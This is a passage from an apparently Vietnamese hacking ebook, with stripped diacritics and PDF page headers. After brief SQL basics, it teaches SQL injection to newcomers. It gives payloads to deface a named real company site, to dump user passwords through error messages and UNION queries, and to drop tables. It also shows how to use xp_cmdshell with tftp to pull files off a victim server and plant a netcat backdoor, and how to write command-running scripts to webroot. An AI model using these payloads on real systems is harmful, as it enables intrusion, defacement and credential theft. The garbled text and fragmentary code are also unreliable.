SELECT tn_ct, SUM(tn_ct) FROM tn_bng

GROUP BY tn_ct

HAVING SUM(tn_ct) iu_kin gi_tr

Ta s dng li bng Sales trn. Cu lnh SQL sau:

SELECT Company, SUM(Amount) FROM Sales

GROUP BY Company

HAVING SUM(Amount) > 10000

s tr v kt qu:

Company SUM(Amount)

W3Schools 12600

B danh

Vi SQL, b danh c thc s dng cho tn ca ct v tn ca bng.

B danh ct:

C php b danh ct nh sau:

8/7/2019 Hacking Credit Card

37/61

SELECT tn_ct AS b_danh_ct FROM tn_bng

B danh bng:

B danh bng c c php nh sau:

SELECT tn_ct FROM tn_bng AS b_danh_bng

V d s dng b danh ct:

Ta c bng Persons nh sau:

LastName FirstName Address City

Hansen Ola Timoteivn 10 Sandnes

Svendson Tove Borgvn 23 Sandnes

Pettersen Kari Storgt 20 Stavanger

Cu lnh SQL sau:

SELECT LastName AS H, FirstName AS Tn

FROM Persons

S tr v kt qu:

H Tn

Hansen Ola

Svendson Tove

Pettersen Kari

DeFace bng SQL injection, Cbn

(by sinhcv)

8/7/2019 Hacking Credit Card

38/61

FOR NEWBIEHihi em xin tip tc,bi ny vn l cbn cho newbie,cn cao siu hn th em chu.yem xin mn php ly thng Ford ra lm victim.Mc ch ca bi ny l s dng cc culnh update,insert ,drop,delete... trong SQL deFace.To 1 file c ni dung nh sau:TIM KIEM DIA DIEM JOB

Save as li thnh file xx.html,sau run nh sauTIM KIEM: xxxDIA DIEM: 22JOB: 1' SQL command --Trong database ca n c table Fordvn_news vi cc column

MessageId','Status','Priority','Subject','Lead','Img','Posted','Edited','Published','FromIp','Body','ReadCount'Tng ng vi trang news ca nhttps://www.ford.com.vn/News/News.aspy em xin chn ci subject deface vi messageid=146Roi:y l cc cu lnh cn bit

Insert into user ("id","pas") values (1,"xxx")-- /*thm 1 user xxx vo table user */update user set pass="xxxx" where id=1-- /thay i pasword ca thng user c id=1 */drop table user-- /*nguy him,xa table user */drop database db-- /*rt nguy him/delete from user where id=1-- /*xa column */..............y em dng updateQUOTETIM KIEM: xxxDIA DIEM: 22

https://www.ford.com.vn/News/News.asphttps://www.ford.com.vn/News/News.asp

8/7/2019 Hacking Credit Card

39/61

JOB: 1' ;update fordvn_news set subject='TEST' where messageid=146--Nu bn nhn dc 1 thng bo nh th ny thay v 1 thng bo li SQL th thnh cng ri

QUOTEKhng tm c theo yu cu ca bn!

OK come on

https://www.ford.com.vn/News/News.asp

Bn cn c th lm dc nhiu th hn ti na,y ch l VD thoai.

Good luck !!!

Hack server b SQL Injection

( Copyright by Windak )

( --Thanks bro Aclatinh and bro MRRO-- )

1)T l thnh cng 80%:

iu kin server phi l winnt v user dng inject l user c quyn dng xp_cmdshell(sa, dbo)

check bn c th lm sau y trn inject link

[injection link] %2b convert (int,(system_user())

Nu KQ l sa hoc dbo c l bn c th tn cng c ri.

Nu bn c sa hoc dbo nhng m admin li khng cho s dng cmdshell bn hy btn ln (bt th no t tm hiu nh )

Lu : bn s ch hackc vo server cha database ca n thi (nhiu khi tdatabase chung vi host )

Cc tool cn thit :

8/7/2019 Hacking Credit Card

40/61

tftpd32 , backdoor

+++Mt vi kinh nghim hack, bit lnh DOS v mt cht hiu bit v network

2) Tng bc tip cn

a)Cc khi nim:

Lu : Cch hack ny ca ti khng phi l mt chung nht, bi v cn rt nhiu cchkhc, cch ny ca ti hack thng qua giao thc TFTP.

Ni sv giao thc TFTP :

l mt giao thc truyn file serverclient . N hot ng tng t nh FTP nhngn gin hn nhiu , thng qua port 69, v mt u im, n khng cn password (y liu quan trng ta hack)

Vo DOS g tftp /? -> Bn sc c php ca n nh sau :

TFTP [-i] host PUT || GET filename [v tr file mun gi n]

-i : nu bn cn truyn mt file dng binary hy s dng n

host : IP ca my server

PUT : nu bn mun send file

GET : nu bn mun ly file

V d v mt lnh tftp :

Tftp i xxx.xxx.xxx.xxx PUT netcat.exe C:\nc.exe

S ly file netcat.exe trn my server (my c IP xxx.) v chuyn vo C:\nc.exe trnmy client (my g lnh trn)

By gita s test trc tip trn localhost. bn hy mtftpd32 ln bin my mnh thnhmt server tftp (lu phi tt ht firewall giao thc mi thc hin tt)

Trong tftpd32 c phn BASE directory mc nh l [path to]\tftpd32e, n s l th mct cc file up hoc download ca bn khi thc hin trao i file vi client (v bn lserver) (bn c th change nu thch).

Trong bi ny ti dng [link] thay cho link cc bn inject, hy chnh li cho ph hp run exec (thm (), ( nu cn )

8/7/2019 Hacking Credit Card

41/61

V dng thay cho Ip ca cc bn (n s hin th khi cc bn bt tftpd32)

Tn cng thc s:

-------------------------------BEGIN----------------------------------

Command1 : RUN COMMAND DOS trn my victim :

[link] exec master..xp_cmdshell [command]

Command 2 : DOWNLOAD FILE t my victim

[link] exec master..xp_cmdshell tftp PUT [path][filecandown]

V d : Ly Ip my victim :

(1)[link] exec master..xp_cmdshell ipconfig > a.txt

(2)[link] exec master..xp_cmdshell tftp PUT a.txt

----Gii thch :

(1) : run lnh ny : ipconfig >a.txt to file a.txt vi ni dung l kt qu ca lnhipconfig

(2) : run tftp PUT a.txt chuyn file a.txt vi ni dung va to --> server (mychng ta )

Command3 : UPLOAD BACKDOOR ln my victim :

[link] exec master..xp_cmdshell tftp [i] GET backdoor [path muon backdoorct]

v d : upload netcat vo C:\WINNT:

[link] exec master..xp_cmdshell tftp i GET nc.exe C:\WINNT\nx.exe

----------------------------------END------------------------------

3) Kt:

8/7/2019 Hacking Credit Card

42/61

Nh vy chng ta bit cch run command (bn c th run file exe ) , bit down, upfile, hu nh lm chc server ri y . Cn hack nhanh hay chm, hiu qu baonhiu l do bn

( Nu test thy li g xin lin hhttp://shacker.computed.net/baivet/nangcao/windak88@yahoo.com )

Chc hack vuiy

vn SQL:

Hack Sql Inject nng cao

Cc bn th xem mt cu truy vn SQL:

select id, forename, surname from authors th 'id','forename' v 'surname' l column catable author,khi cu truy vn trn lm vic th n s cho kt qu tt c cc dng trongtable author.Xem cu truy vn sau:

select id, forename, surname from authors where forename = 'john' and surname = 'smith'

y l cu truy vn c iu kin chc khng ni cc bn cng bit,n cho ra kt qu ttc nhng ai trong csdl vi forename = 'john' and surname = 'smith'

V vy khi vo gi tru vo khng ng nh trong csdl liu:

Forename: jo'hn

Surname: smith

Cu truy vn trthnh:

select id, forename, surname from authors where forename = 'jo'hn' and surname = 'smith'

Cu truy vn trn khi c x l th n s pht sinh li:

Server: Msg 170, Level 15, State 1, Line 1

Line 1: Incorrect syntax near 'hn'.

L do l ta lng vo du nhy n "'" v gi tr vo trthnh 'hn' sai so vi csdl vy spht sinh li li dng ci ny attacker c th xo d liu ca bn nh sau:

http://shacker.computed.net/baivet/nangcao/windak88@yahoo.comhttp://shacker.computed.net/baivet/nangcao/windak88@yahoo.com

8/7/2019 Hacking Credit Card

43/61

Forename: jo'; drop table authors--

Table author s b xa ->nguy him phi khng

Nhn vo on code asp sau:y l mt form login

Login Page

Login

Username:

Password:

8/7/2019 Hacking Credit Card

44/61

y l code 'process_login.asp'

p { font-size=20pt ! important}

font { font-size=20pt ! important}

h1 { font-size=64pt ! important}

8/7/2019 Hacking Credit Card

45/61

and password = '" + password + "'";

trace( "query: " + sql );

rso.open( sql, cn );

if (rso.EOF)

{

rso.close();

%>

ACCESS DENIED

ACCESS GRANTED

8/7/2019 Hacking Credit Card

46/61

Welcome,

0)

{

Login( cn );

}

cn.close();

}

Main();

%>

y l cu truy vn SQL:

var sql = "select * from users where username = '" + username + "'and password = '" +password + "'";

8/7/2019 Hacking Credit Card

47/61

nu hacker vo nh sau:

Username: '; drop table users--

Password:

th table 'user; s b xo,v ta c th vt qua bng cch sau:bypass cc bn bit ht riti khng ni li na - ( Bn tham kho li Cn bn hack 1 website b li SQLInjection )

trng username hacker c th vo nh sau:

Username: ' union select 1, 'fictional_user', 'some_password', 1--

v d table userc to nh sau:

create table users( id int,

username varchar(255),

password varchar(255),

privs int

)

v insert vo:

insert into users values( 0, 'admin', 'r00tr0x!', 0xffff )

insert into users values( 0, 'guest', 'guest', 0x0000 )

insert into users values( 0, 'chris', 'password', 0x00ff )

8/7/2019 Hacking Credit Card

48/61

insert into users values( 0, 'fred', 'sesame', 0x00ff )

Cc hacker s bit c kt qu cc column v table qua cu truy vn having 1=1

Username: ' having 1=1--

Li pht sinh:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is

invalid in the select list because it is not contained in an aggregate

function and there is no GROUP BY clause.

/process_login.asp, line 35

Tip tc ly cc ci cn li:

Username: ' group by users.id having 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username'

is invalid in the select list because it is not contained in either an

aggregate function or the GROUP BY clause.

/process_login.asp, line 35

>> bit c column 'username'

' group by users.id, users.username, users.password, users.privs having 1=1--

8/7/2019 Hacking Credit Card

49/61

Cho n khi khng cn bo li th dng li , vy l bn bit table v column cn khaithc ri, by gin i ly gi tr ca n:

xc nh ni dung ca column ta dng hm sum()

Username: ' union select sum(username) from users--

[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average

aggregate operation cannot take a varchar data type as an argument.

/process_login.asp, line 35

Gi tr ca username l varchar,khng ni cc bn cng bit l do,cn dng vi id th saonh:

Username: ' union select sum(id) from users--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL

statement containing a UNION operator must have an equal number of

expressions in their target lists.

/process_login.asp, line 35

Vy l ta c th insert vo csdl:

Username: '; insert into users values( 666, 'attacker', 'foobar', 0xffff)--

Ly Version ca server:

Username: ' union select @@version,1,1,1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

8/7/2019 Hacking Credit Card

50/61

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug

6 2000 00:57:48 Copyright 1988-2000 Microsoft Corporation Enterprise

Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ' to a column of

data type int.

/process_login.asp, line 35

c th dng convert() nhng ti ch cc bn dng union ,cc bn thc ni dung ca ccuser trogn table nh sau:

Username: ' union select min(username),1,1,1 from users where username > 'a'--

Chn gi tr nh nht ca username v cho n ln hn 'a' -> pht sinh li:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

the varchar value 'admin' to a column of data type int.

/process_login.asp, line 35

Vy l ta bit 'admin' acc tn ti,tip tc xem sao:

Username: ' union select min(username),1,1,1 from users where username 'admin'--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

the varchar value 'chris' to a column of data type int.

/process_login.asp, line 35

8/7/2019 Hacking Credit Card

51/61

Vy l khi c username -> ly pass:

Username: ' union select password,1,1,1 from users where username ='admin'--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

the varchar value 'r00tr0x!' to a column of data type int.

/process_login.asp, line 35

y l k thut m bn c th ly c user mt cch cao cp:

To mt script nh sau:

begin declare @ret varchar(8000)

set @ret=':'

select @ret=@ret+' '+username+'/'+password from users where

username>@ret

select @ret as ret into foo

end

->cu truy vn:

Username: '; begin declare @ret varchar(8000) set @ret=':' select

@ret=@ret+' '+username+'/'+password from users where username>@ret

select @ret as ret into foo end--

To mt table 'foo' vi mt column l 'ret'

8/7/2019 Hacking Credit Card

52/61

Tip tc:

Username: ' union select ret,1,1,1 from foo--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting

the varchar value ': admin/r00tr0x! guest/guest chris/password

fred/sesame' to a column of data type int.

/process_login.asp, line 35

(Hnh nh mrro dng kiu ny vo VDC)

Xo du vt:

Username: '; drop table foo--

Mt hacker khi iu kin c csdl th h mun xa hn l iu khin h thng mngca server lun,mt trong s cch :

1-S dng xp_cmdshell khi c quyn 'sa'

2-S dng xp_regread c register,bao gm SAM

3-Chy link query trn server

4-To script trn server khai thc

5-S dng 'bulk insert' c bt c file no trn h thng

6-S dng bcp to qun cho text file trn server

7-S dng sp_OACreate, sp_OAMethod and sp_OAGetProperty to script (ActiveX)chy trn server

8/7/2019 Hacking Credit Card

53/61

[xp_cmdshell]

Chc cc bn cng nghe nhiu ri v d:

exec master..xp_cmdshell 'dir'

exec master..xp_cmdshell 'net1 user'

S dng thi hnh cc lnh ca dos vvv.. rt hu hiu

[xp_regread]

Cc hm lin quan...

xp_regaddmultistring

xp_regdeletekey

xp_regdeletevalue

xp_regenumkeys

xp_regenumvalues

xp_regread

xp_regremovemultistring

xp_regwrite

V d:

exec xp_regread HKEY_LOCAL_MACHINE,

'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters','nullsessionshares'

8/7/2019 Hacking Credit Card

54/61

Xc inh null-session share c tn ti trn server

exec xp_regenumvaluesHKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'

vv.. cn nhiu th na

[Other Extended Stored Procedures]

services:

exec master..xp_servicecontrol 'start', 'schedule'

exec master..xp_servicecontrol 'start', 'server'

>ng qua cng bit n lm g...

[Importing text files into tables]

S dng 'bulk insert' chn text file vo th mc hin thi,to table n:

create table foo( line varchar(8000) )

tip tc:

bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp'

[Creating Text Files using BCP]

VD:

bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar

8/7/2019 Hacking Credit Card

55/61

[ActiveX automation scripts in SQL Server]

Dng 'wscript.shell'

vd:

declare @o int

exec sp_oacreate 'wscript.shell', @o out

exec sp_oamethod @o, 'run', NULL, 'notepad.exe'

Tren cu truy vn:

Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod@o, 'run', NULL, 'notepad.exe'--

Dng 'scripting.filesystemobject' c file:

declare @o int, @f int, @t int, @ret int

declare @line varchar(8000)

exec sp_oacreate 'scripting.filesystemobject', @o out

exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1

exec @ret = sp_oamethod @f, 'readline', @line out

while( @ret = 0 )

begin

print @line

exec @ret = sp_oamethod @f, 'readline', @line out

end

To script ASP thi hnh command:

8/7/2019 Hacking Credit Card

56/61

declare @o int, @f int, @t int, @ret int

exec sp_oacreate 'scripting.filesystemobject', @o out

exec sp_oamethod @o, 'createtextfile', @f out,

'c:\inetpub\wwwroot\foo.asp', 1

exec @ret = sp_oamethod @f, 'writeline', NULL,

''

y l nhng cch bn c th dng rt hiu qu,bn hy sng to thm cho mnh tnhng ch dn cbn ny.

Sql Inject M lnh

Ti bit chc rng cc bn y a s ch bit SQL injection bypass login, hm nay txin mn php trnh by nhng k thut m ta c th lm nhiu iu hn l ch vt quapassword ca mt trang b SQL injection.

Lu : a s kin thc ca ti di y ch dng cho server chy MySQL, MSSQL, cnnhng ci khc th khng chc.... Nu bn cha bit lnh SQL th khng nn c bi nym nn tham kho n trc, OKie ??? Ti khng mun thy nhng cu tr li i loinh --- "Tui chng hiu g ht ", "Si u th" ,.....

1)Ly tn table v column hin hnh:

Structure :

Login page (or any injection page)::::

username: ' having 1=1--

KQ: -------------------------------

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.ID' is invalid inthe select list because it is not contained in an aggregate function and there is no GROUPBY clause.

8/7/2019 Hacking Credit Card

57/61

--------------------------------------

----> Ta c c TABLE VICTIM

Tip tc

username: ' group by VICTIM.ID having 1=1--

KQ :---------------------------------

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.Vuser' is invalidin the select list because it is not contained in either an aggregate function or the GROUPBY clause.

-------------------------------------------

Vy l ta c column Vuser

2) UNION nh m hiu qu

Vng tha cc bn, ta c th dng n ly c gn nh mi th .

Trc ht ti xin ni squa ci Structure ca n :

Login page ::::

username : ' Union select [column] from [table] where [column2=...]--

password : everything

Vd: Gi s ta bit 2 column username v password trong table VTABLE cua dbvictim l VUSER v VPASS th ta lm nh sau

username : ' Union select VPASS from VTABLE where VUSER='admin'-- (1)

password : everything

8/7/2019 Hacking Credit Card

58/61

(1) : Trong trng hp ny admin l mt user m bn bit nu khng c th b trng, ns cho bn useru tin

KQ:-----------------------------

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statementcontaining a UNION operator must have an equal number of expressions in their targetlists.

---------------------------------

Nu KQ ra nh trn c ngha l bn phi union thm nhiu column na tt c columnca table VTABLE c Union ht. Structure ca n nh sau:

username : ' Union select VPASS,1,1,1...1,1 from VTABLE where VUSER='admin'-- (1)

password : everything

Bn hy thm ",1" cho n khi kt qu ra i loi nh

--------------------------------

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting thenvarchar value 'tuibihackroi' to a column of data type int.

--------------------------------

Nh vy Pass ca user 'admin' l 'tuibihackroi'

Vng tha cc bn SQL injection tht th v, v y l iu ta c th lm trong bi vithm nay ca ti : Ly sch database ca i phng.

8/7/2019 Hacking Credit Card

59/61

3) Ly ht value ca mt column bit trong mt table bit

B quyt y l Not in Structure ca n nh sau (s dng v d vi column ca bitrc):

Vi Vuser l admin ta c th ly c cc user khc

-----Login Page ::::::

username: Union select Vuser,1,1,1,1 from Vtable where username not in(admin)

-------------------------

Vng, sau chng ta s thu c thm mt user na v ch vic chn vo trong Not in (vd: Not in (admin,hacker,.)) c lm tip tc nh th ta s c ht mi user(dnhinsau l mi password).

**** ly danh sch tn cc user theo mt quy nh m bn chn , v d chi ly ccuser c cha t admin chng hn ta dng like : cu trc

-----Login Page ::::::

username: Union select Vuser,1,1,1,1 from Vtable where username not in (admin)

like %admin%

-------------------------

4) Ly ht table v column ca ca database:

B quyt chnh l table ny ca database : INFORMATION_SCHEMA.TABLES vicolumn TABLE_NAME (cha ton b table) v table :INFORMATION_SCHEMA.COLUMNS vi column COLUMN_NAME (cha ton b

column)

Cch s dng dng Union:

-----Login page :::::::

8/7/2019 Hacking Credit Card

60/61

username: UNION SELECT TABLE_NAME,1,1,1,1 FROMINFORMATION_SCHEMA.TABLES WHERE .

---------------------------

Nh vy ta c th ly c ht table, sau khi c table ta ly ht column ca table :

-----Login page :::::::

username: UNION SELECT COLUMN_NAME FROMINFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME= and

---------------------------

Trn y l nhng iu cn bn nht v SQl injection m ti c th cung cp cho cc bn,cn lm c tt hay khng th phi c mt cht sng to na hy vng n gip ch chocc bn mt cht khi gp mt site b SQl injection

5) Khng cn UNION:

Nu cc bn ngi dng Union v nhng bt tin ca n th cc bn c th dng "Convert"mt cch d dng hn thu thp info qua cc thng bo li

Structure :

---login page::::

user : ' + convert (int,(select @@version))--

-------------------------

Trn l mt v d bn ly version, giy mun ly bt c info no bn ch cn thayvo ci "select @@version" nhng nhnu l ln u tin get info th thm TOP 1 vonh

8/7/2019 Hacking Credit Card

61/61

vd: user : ' + convert (int,(select Vpass from Vtable where Vuser='admin'))--

Lu : Nu cc bn s dng khng c th c th v du + khng c chp nhn, lc hy thay n === %2b

vd: user : ' %2b convert (int,(select Vpass from Vtable where Vuser='admin'))--

6) Run command SQL :

run command bn c th dng du ";"

Structure :

login page :::::

user :' ; [command]--

-----------------------------

vd: '; DROP TABLE VTABLE--

Nu cc bn rnh v SQL th c th lm c rt nhiu iu th v qua ci ny , nhng txin phn cho cc bn t nghin cu nh.

Chm ht cun Ebook. Chc cc bn may mn. Hack ch l hc hi v